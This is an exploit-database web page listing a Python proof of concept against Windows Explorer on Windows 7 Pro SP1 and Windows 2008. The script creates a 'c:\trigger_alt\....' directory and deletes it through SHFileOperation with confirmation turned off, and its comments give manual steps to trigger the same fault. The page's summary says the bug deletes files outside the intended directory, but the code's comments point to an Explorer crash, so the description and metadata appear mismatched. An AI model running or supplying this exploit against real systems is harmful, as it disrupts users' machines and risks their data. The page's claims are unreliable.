header-logo
Suggest Exploit
vendor:
Windows
by:
Level & z0r0
8.8
CVSS
HIGH
Directory Traversal
22
CWE
Product Name: Windows
Affected Version From: Windows 2008 SP2 RC2 & Windows 7 Pro SP1
Affected Version To: Windows 2008 SP2 RC2 & Windows 7 Pro SP1
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2020

Windows 2008 SP2 RC2 Explorer Go Byebye :P & Windows 7 Pro SP1 Explorer Go Byebye :P

This exploit is a directory traversal vulnerability which allows an attacker to delete files and directories outside of the intended directory. The exploit is triggered by creating a directory named 'trigger_alt' and a subdirectory named '....' in the root directory of the system. The attacker then uses the SHFileOperation function to delete the 'trigger_alt' directory, which in turn deletes the '....' directory and any other files or directories outside of the intended directory.

Mitigation:

Ensure that user input is properly sanitized and validated to prevent directory traversal attacks.
Source

Exploit-DB raw data:

# Windows 2008 SP2 RC2 Explorer Go Byebye :P
# Windows 7 Pro SP1 Explorer Go Byebye :P
# Interesting
# Brought to you by Level & z0r0 @ Smash The Stack

from win32com.shell import shell, shellcon
from os import mkdir

try:
	mkdir("c:\\trigger_alt")
except:
	print "[!] Trigger Directory Exists"
try:
	mkdir("c:\\trigger_alt\\....")
except:
	print "[!] Trigger Sub Directory Exists"

print "[!] Triggering Issue"

# This moves the directory containing the sub directory which creates the condition.
# The issue is in the function that moves the files to the recycle bin
# Replicate this using the following
# 1- mkdir c:\trigger_alt
# 2- cd c:\trigger_alt
# 3- mkdir ....\
# 4- My Computer -> c:\trigger_alt
# 5- Right Click -> Delete 

shell.SHFileOperation((0,shellcon.FO_DELETE,'c:\\trigger_alt',None,shellcon.FOF_ALLOWUNDO|shellcon.FOF_NOCONFIRMATION))

Navigation

Suggest Exploit

Services By CQR